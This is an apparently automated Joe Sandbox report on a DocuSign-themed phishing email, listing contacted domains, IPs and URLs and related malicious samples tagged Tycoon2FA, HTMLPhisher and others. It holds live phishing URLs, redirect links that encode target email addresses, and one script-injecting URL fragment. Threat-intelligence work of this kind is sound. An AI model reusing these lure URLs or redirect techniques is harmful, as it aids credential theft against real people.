cdnjs.cloudflare.com	104.17.24.14	true	false	unknown
challenges.cloudflare.com	104.18.95.41	true	false	unknown
www.google.com	142.250.186.100	true	false	unknown
api.mixpanel.com	130.211.34.183	true	false	unknown
flifeserieso.ru	104.21.17.93	true	false	unknown
arya-1323461286.us-west-2.elb.amazonaws.com	34.223.160.188	true	false	unknown
eu.docusign.net	unknown	unknown	false	unknown
cdn.jsdelivr.net	unknown	unknown	false	unknown
a.docusign.com	unknown	unknown	false	unknown
docucdn-a.akamaihd.net	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da4fc5b09f32845&lang=auto	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1791242059:1730220306:hIeyHqvqAccxbbm_d8DrvjbO0QBodfJlv7y3N_edJQw/8da4fc5b09f32845/lvhtOsKNcCfcfrt0ku2v17ixFLNSgZzFX4Vo47Kh81E-1730223994-1.1.1.1-M_x_gxlO74O9ZlqtQnFTaE.kRURIq0V2sN_HzuC_s_HLi.8Bl2E57.DtlSzwL1gQ	false		unknown
https://cosiosos.com.de/favicon.ico	false		unknown
https://challenges.cloudflare.com/turnstile/v0/api.js	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8da4fc5b09f32845/1730223996758/1e184772ca6413f778890ebf4ae4a78ff3b0fbad3e6bc6e49bef09eb3011d191/B-gsnUcxkDLo1qD	false		unknown
https://a.nel.cloudflare.com/report/v4?s=78PcKPPc%2BblG5PoT1jZcMGvy0TBphHg6dRAaBqMRmtpWSoW8b8ghN%2FZXDLM9HZRqdHN2eldibX4W6tTXEPjuHGieGOcBTyAtlal30hZjAgvDhV%2BQtpv8anVv0yCaeZ5ED1Y%3D	false		unknown
https://flifeserieso.ru//	false		unknown
https://cosiosos.com.de/7i2ko/	true		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8da4fc5b09f32845/1730223996761/-6kEvfHpi1C4zu8	false		unknown
https://eu.docusign.net/Signing/?ti=5b53a0b084d642eca99669daad04dad2	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/910uj/0x4AAAAAAAymLki0nrxyy8m1/auto/fbE/normal/auto/	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css	false	URL Reputation: safe	unknown
https://cdn.optimizely.com/datafiles/MUGKFLCdCtxUSgrSTyhbw.json	false		unknown
https://challenges.cloudflare.com/turnstile/v0/g/f2bbd6738e15/api.js	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	false	URL Reputation: safe	unknown
https://a.docusign.com/ds_arya_wrapper.min.js?f=1	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://docucdn-a.akamaihd.net/olive/images/2.62.0/global-assets/email-templates/email-logo.png	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
https://developer.mozilla.org/en-US/docs/DOM/XMLHttpRequest#withCredentials	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://github.com/douglascrockford/JSON-js/blob/master/json_parse.js	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://support.docusign.com/	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
https://gist.github.com/1930440	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://github.com/zloirock/core-js	chromecache_207.11.dr, chromecache_162.11.dr	false		unknown
https://login.windows.localnull	OUTLOOK_16_0_16827_20130-20241029T1344530496-6316.etl.3.dr	false		unknown
https://wdk-agent-2.docusigntest.com/#Signing/Controllers/MonitoringController.cs	chromecache_198.11.dr	false		unknown
https://eu.docusign.net/member/Images/email/docInvite-white.png	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
http://dean.edwards.name/weblog/2005/10/add-event/	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://aka.ms/LearnAboutSenderIdentification	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false	URL Reputation: safe	unknown
https://support.docusign.com/s/articles/How-do-I-sign-a-DocuSign-document-Basic-Signing?language=en_	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
https://community.docusign.com/esignature-111?utm_campaign=GBL_US_PRD_AWA_2405_CommunityCTA&utm_medi	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
http://documentcloud.github.com/underscore/	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://eu.docusign.net	chromecache_198.11.dr	false		unknown
http://www.ecma-international.org/ecma-262/5.1/#sec-12.4	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://docucdn-a.akamaihd.net/production/1ds/widgets/	chromecache_198.11.dr	false		unknown
https://protect.docusign.net/report-abuse?e=AUtomjpFak9GlbPL0zFFi11QWZPQRVAXy0-T2ps_NbUh_ZoXBfZPath_	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
http://dbj.org/dbj/?p=286	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
http://hacks.mozilla.org/2009/07/cross-site-xmlhttprequest-with-cors/	chromecache_188.11.dr, chromecache_169.11.dr	false		unknown
https://support.docusign.com/en/articles/How-do-I-manage-my-email-notifications	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
https://eu.docusign.net/Signing/EmailStart.aspx?a=9eb1232d-b669-47cc-b565-df3c91f4d5f7&etti=24&acct=	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	true		unknown
https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificat	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
https://support.docusign.com/en/guides/Declining-to-sign-DocuSign-Signer-Guide	~WRS{318981B6-151B-4DCC-A0C6-FBB8743FF0B3}.tmp.3.dr	false		unknown
https://apps.docusign.com/cdn/production/1ds/widgets/	chromecache_198.11.dr	false		unknown
https://login.windows.localR	OUTLOOK_16_0_16827_20130-20241029T1344530496-6316.etl.3.dr	false		unknown
https://github.com/zloirock/core-js/blob/v3.30.2/LICENSE	chromecache_207.11.dr, chromecache_162.11.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.28.165	cosiosos.com.de	United States	13335	CLOUDFLARENETUS	false
130.211.34.183	api.mixpanel.com	United States	15169	GOOGLEUS	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
34.223.160.188	arya-1323461286.us-west-2.elb.amazonaws.com	United States	16509	AMAZON-02US	false
104.18.65.57	cdn.optimizely.com	United States	13335	CLOUDFLARENETUS	false
52.42.45.237	unknown	United States	16509	AMAZON-02US	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false
104.21.17.93	flifeserieso.ru	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544787
Start date and time:	2024-10-29 18:44:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FW Complete with Docusign Remittance Advice .pdf.eml
Detection:	MAL
Classification:	mal60.phis.winEML@20/228@50/13
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .eml

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.16.100.168, 88.221.110.91, 184.28.90.27, 52.113.194.132, 52.109.76.243, 2.19.126.151, 2.19.126.160, 52.109.32.46, 52.109.32.47, 52.109.32.38, 52.109.32.39, 51.132.193.105, 142.250.185.195, 173.194.76.84, 142.250.181.238, 185.81.100.28, 34.104.35.123, 2.16.164.83, 2.16.164.115, 95.101.54.121, 95.101.54.217, 104.46.162.227, 172.217.23.106, 172.217.18.106, 142.250.186.74, 142.250.186.106, 142.250.184.202, 142.250.74.202, 142.250.186.138, 172.217.18.10, 142.250.181.234, 172.217.16.138, 216.58.206.74, 142.250.184.234, 142.250.186.42, 216.58.212.138, 142.250.186.170, 172.217.16.202, 216.58.212.131, 2.19.126.97, 2.19.126.79, 2.19.126.135, 2.19.126.140, 172.217.16.142, 104.18.186.31, 104.18.187.31, 2.23.209.130, 2.23.209.149, 2.23.209.177, 2.23.209.133, 2.23.209.140, 2.23.209.176, 2.23.209.158, 2.23.209.135, 2.23.209.150
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, a1737.b.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net, ecs.office.com, fs.microsoft.com, content-autofill.googleapis.com, eu-northeast.docusign.net.akadns.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, nleditor.osi.office.net, onedscolprduks05.uksouth.cloudapp.azure.com, edgedl.me.gvt1.com, s-0005.s-msedge.net, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, clients.l.google.com, omex.cdn.office.net, cdn.jsdelivr.net.cdn.cloudflare.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, onedscolprdaus03.aus
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: FW Complete with Docusign Remittance Advice .pdf.eml

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.24.14	Proforma.Invoice.Payment.$$.html	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
104.18.65.57	(No subject) (92).eml	Get hash	malicious	Unknown	Browse
	https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29t	Get hash	malicious	Unknown	Browse
	https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ==	Get hash	malicious	Tycoon2FA	Browse
	https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=	Get hash	malicious	Unknown	Browse
	https://na4.docusign.net/Signing/EmailStart.aspx?a=c1ee55e8-d253-4731-bf85-5377494446fc&etti=24&acct=c49653d8-ee55-4f22-afc9-287006261d0b&er=251e9446-3fcb-4714-8d01-feee559625a8	Get hash	malicious	HTMLPhisher	Browse
	https://talentrecruting.com/?Y3w2MDkxNzZ8d190cmF1MTEwRHx8fA0KfHxicnlhbi50LmJlYmJAc2FpYy5jb20=	Get hash	malicious	Unknown	Browse
	https://na2.docusign.net/Signing/EmailStart.aspx?a=52f7eab1-67dd-4b2c-9342-8cf1837ca85b&etti=24&acct=8327544d-e5d8-4fb1-8036-f62a8723beb9&er=1f6c0370-0bf0-4639-942a-0c529236b3c5	Get hash	malicious	HtmlDropper	Browse
	https://na3.docusign.net/Signing/EmailStart.aspx?a=119f68e4-ce2c-4337-abcf-20449fabc48a&etti=24&acct=05b64014-5519-4569-8f43-5b3079a08bb5&er=6843d1a3-b45c-4ba9-abc9-dca563e838fa__;!!O2i0137kdDYgisg!hOYz5IH_iJ_EiNVl8KU7XRSqWHtjUT_-7anDxA0YgBD-wvRpW9QU0sz9vL8ojPsfmoxnwuchvbDu_H5qacWjfRaw$	Get hash	malicious	Unknown	Browse
	https://na4.docusign.net/Signing/EmailStart.aspx?a=9566a7d5-84da-4cec-bac4-a41515e7dff8&etti=24&acct=e7f3e748-8206-4510-8315-0e64f8c91c9b&er=178b86a5-d36b-40e1-a378-9dea4b3e4e9d	Get hash	malicious	HTMLPhisher	Browse
104.18.94.41	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://hhicorporation.start.page/	Get hash	malicious	Unknown	Browse
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse
	http://email.lndg.page/ls/click?upn=u001.IvLseMgsVhVvzUpwRiP-2FwDY1kjINp61fUuRWFtJrOlsR2xK9oB-2FfYMEmxXZADqvZYVpAGo4tqJabIsrfh5cAoQ-3D-3DBY5f_Z037rZRAjNnoLxuCNZalsWeL-2FuGvpRjfvafXSKPUadVelwBKNiVQ67EtFqVq-2F-2FAK6i6xZqeXhJzRqi8XomI4er4VLqx9iTYG7-2BCEAXYgFCl0PkJ3-2Fta3PunUyBaUajSXL-2F4RU8ivpOSEDeErwB8BZGzV2oyEJ1SK5v6Yp5gOMXaPWrDBmQyDNn3b-2FaOwkDESVUP2cfI7B8pfKWj4ZDcF0w-3D-3D	Get hash	malicious	Unknown	Browse
	CARDFACTORYAccess Program, Tuesday, October 29, 2024.eml	Get hash	malicious	HTMLPhisher	Browse
	Jonathangodber October 2024.pdf	Get hash	malicious	Tycoon2FA	Browse
	http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=	Get hash	malicious	Unknown	Browse
	https://dvhpkbq.sharing.bublup.com/mybublup/#/mystuff/001-f-cb6f5ea2-07bf-4021-a767-4b4547f8c10b/mixed?lid=001-si-_s1J1-rGiVhh	Get hash	malicious	HTMLPhisher	Browse
	https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#	Get hash	malicious	HTMLPhisher	Browse
	https://inspireelectricale.za.com/u78dq	Get hash	malicious	HTMLPhisher	Browse
52.42.45.237	(No subject) (92).eml	Get hash	malicious	Unknown	Browse
52.42.45.237	https://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00d	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
arya-1323461286.us-west-2.elb.amazonaws.com	(No subject) (92).eml	Get hash	malicious	Unknown	Browse	52.42.45.237
	https://na4.docusign.net/Signing/EmailStart.aspx?a=c1ee55e8-d253-4731-bf85-5377494446fc&etti=24&acct=c49653d8-ee55-4f22-afc9-287006261d0b&er=251e9446-3fcb-4714-8d01-feee559625a8	Get hash	malicious	HTMLPhisher	Browse	52.35.199.106
	https://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00d	Get hash	malicious	Unknown	Browse	52.42.45.237
	https://na2.docusign.net/Signing/EmailStart.aspx?a=52f7eab1-67dd-4b2c-9342-8cf1837ca85b&etti=24&acct=8327544d-e5d8-4fb1-8036-f62a8723beb9&er=1f6c0370-0bf0-4639-942a-0c529236b3c5	Get hash	malicious	HtmlDropper	Browse	52.40.33.218
	https://na3.docusign.net/Signing/EmailStart.aspx?a=119f68e4-ce2c-4337-abcf-20449fabc48a&etti=24&acct=05b64014-5519-4569-8f43-5b3079a08bb5&er=6843d1a3-b45c-4ba9-abc9-dca563e838fa__;!!O2i0137kdDYgisg!hOYz5IH_iJ_EiNVl8KU7XRSqWHtjUT_-7anDxA0YgBD-wvRpW9QU0sz9vL8ojPsfmoxnwuchvbDu_H5qacWjfRaw$	Get hash	malicious	Unknown	Browse	54.71.130.106
	https://na4.docusign.net/Signing/EmailStart.aspx?a=9566a7d5-84da-4cec-bac4-a41515e7dff8&etti=24&acct=e7f3e748-8206-4510-8315-0e64f8c91c9b&er=178b86a5-d36b-40e1-a378-9dea4b3e4e9d	Get hash	malicious	HTMLPhisher	Browse	52.40.33.218
	https://www.docusign.net/Signing/EmailStart.aspx?a=3558ace5-2d0a-45eb-bffa-8ad199bab55c&etti=24&acct=a4d32e98-bf38-497e-a60e-014032ad5c6c&er=8da4f51f-1cd8-4901-90bc-3c1bb1a39ce2	Get hash	malicious	Phisher	Browse	44.238.20.84
	https://na4.docusign.net/Signing/EmailStart.aspx?a=943f47c1-68f1-4387-ae39-91f2830b86a0&etti=24&acct=e7f3e748-8206-4510-8315-0e64f8c91c9b&er=99aeb7e9-c08a-4462-99dc-389e7b080ab6	Get hash	malicious	Phisher	Browse	52.40.33.218
	https://na2.docusign.net/Signing/EmailStart.aspx?a=8ad02d97-8076-44e2-a042-fe16530c5407&etti=24&acct=c5a8c3f6-b465-4834-92a5-13d8938404ab&er=f0b416b1-58c5-41c9-b4fc-e691bed625b5	Get hash	malicious	HTMLPhisher	Browse	35.160.175.105
challenges.cloudflare.com	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.94.41
	https://hhicorporation.start.page/	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	104.18.94.41
	http://email.lndg.page/ls/click?upn=u001.IvLseMgsVhVvzUpwRiP-2FwDY1kjINp61fUuRWFtJrOlsR2xK9oB-2FfYMEmxXZADqvZYVpAGo4tqJabIsrfh5cAoQ-3D-3DBY5f_Z037rZRAjNnoLxuCNZalsWeL-2FuGvpRjfvafXSKPUadVelwBKNiVQ67EtFqVq-2F-2FAK6i6xZqeXhJzRqi8XomI4er4VLqx9iTYG7-2BCEAXYgFCl0PkJ3-2Fta3PunUyBaUajSXL-2F4RU8ivpOSEDeErwB8BZGzV2oyEJ1SK5v6Yp5gOMXaPWrDBmQyDNn3b-2FaOwkDESVUP2cfI7B8pfKWj4ZDcF0w-3D-3D	Get hash	malicious	Unknown	Browse	104.18.95.41
	Oakville_Service_Update_d76b33a1-3420-40be-babd-e82e253ad25c.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	CARDFACTORYAccess Program, Tuesday, October 29, 2024.eml	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.com	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Jonathangodber October 2024.pdf	Get hash	malicious	Tycoon2FA	Browse	104.18.94.41
	http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://dvhpkbq.sharing.bublup.com/mybublup/#/mystuff/001-f-cb6f5ea2-07bf-4021-a767-4b4547f8c10b/mixed?lid=001-si-_s1J1-rGiVhh	Get hash	malicious	HTMLPhisher	Browse	104.18.94.41
cdnjs.cloudflare.com	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Jmaman_##Salary##_Benefit_for_JmamanID#IyNURVhUTlVNUkFORE9NMTAjIw==.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	securedoc_20241028T070148.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Oakville_Service_Update_d76b33a1-3420-40be-babd-e82e253ad25c.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	http://url5148.librariapena.com/ls/click?upn=u001.GicqFEndYG5aFpuN1ngPufTfXrsQ9xNlNirpytR4MM9aBsYYFODsiAPftWqmKpvrE6ff_B2fWkfszhSflnL0HA3FnQqEKk1HJkizy-2Fud2LEQeI5aha2K2G6ppF2O0bL7D7H7LMN8WGu5xRF2M8uaTM6MXf6DAMaADWmIUL1YqZWKrQh1g-2F0n0cxV2mRrNZEteUwfW5DOdClcZ0c7E-2FIhACBFYnzvVFSnfSt3CZCN7P1EL1QyPVm42KBQGCDp3btvtG-2BbRJha-2FOyJXx-2BDZbno3l2jsvw-2FwkacYeoKE0uINsamNbg0rV0A52QCvn7k6VYTShXjbi9u51Z787-2F01bX1DTA9aSBSP-2FWMLEspaU-2FIdc1x-2FmRDSh7t6BQtQAtVlDsdci-2FkdE5XEzXcy1T7RT1mRx0Z8c0C7T5TxNvH7MOJLp-2BPx4LTMm4cKm4w-2Br4av4rqX3sFI-2B0Z54CPJjpfmgkQpOwbMxDkpsmVoLcKhd8rV7DcMtFguJaotRS3nEWM4vOO-2FegVGhzrwPBH6NjA2esFflr-2FYmA56ZztqyuVYNkq6vFbZhu3qpImgcxi-2BBybDKRWWCy9ZJhz5kW6d7c5iFMdA14shvBlO5oteNsOg1T8Wcd4MIJllivR5RQLa6JKyKUfgK8kF9DoOU4JGzocfITKQs9Z05ET92-2FS1aC5wu-2FuyffXQ4VOTrXPB9d3zUlvAaEdOc87CGa5e4y4lu-2F-2B9njpJqjlihSLoXPx3uHJhhT5l60Eu-2Fd0OnNMVN2uGoOn8P4Kyfxcr-2B3atbrIS84kkAo7VV7ElDHFn2Wn-2B0iZqwoFL1t1YCz2cR3xAkH3Dm45o7ag9bF7tv0L4g2t8v1fAwuiPylHAHkqFOEcwcDndKNNLE7ObrCi0wDxBijc-2FYVZU6-2F0yIfBAmiocABK2NEl2-2F-2FPMERnDYg-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6	Get hash	malicious	Mamba2FA	Browse	104.17.25.14
	https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);	Get hash	malicious	Unknown	Browse	104.17.25.14
	Jonathangodber October 2024.pdf	Get hash	malicious	Tycoon2FA	Browse	104.17.25.14
cdn.optimizely.com	(No subject) (92).eml	Get hash	malicious	Unknown	Browse	104.18.65.57
	https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29t	Get hash	malicious	Unknown	Browse	104.18.66.57
	https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ==	Get hash	malicious	Tycoon2FA	Browse	104.18.66.57
	https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=	Get hash	malicious	Unknown	Browse	104.18.66.57
	https://na4.docusign.net/Signing/EmailStart.aspx?a=c1ee55e8-d253-4731-bf85-5377494446fc&etti=24&acct=c49653d8-ee55-4f22-afc9-287006261d0b&er=251e9446-3fcb-4714-8d01-feee559625a8	Get hash	malicious	HTMLPhisher	Browse	104.18.65.57
	EXTERNALRoger Moczygemba shared DIRECT MED CLINIC - CONFIDENTIAL with you.msg	Get hash	malicious	Unknown	Browse	104.18.66.57
	https://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00d	Get hash	malicious	Unknown	Browse	104.18.66.57
	ATT25322.html	Get hash	malicious	Unknown	Browse	104.18.66.57
	https://talentrecruting.com/?Y3w2MDkxNzZ8d190cmF1MTEwRHx8fA0KfHxicnlhbi50LmJlYmJAc2FpYy5jb20=	Get hash	malicious	Unknown	Browse	104.18.66.57

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://get.hidrive.com/api/ZVDVVnH5/file/fgWacQquUMk6LQc3wqBJEz	Get hash	malicious	Unknown	Browse	162.159.140.237
	https://hhicorporation.start.page/	Get hash	malicious	Unknown	Browse	104.18.24.210
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	104.21.33.160
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
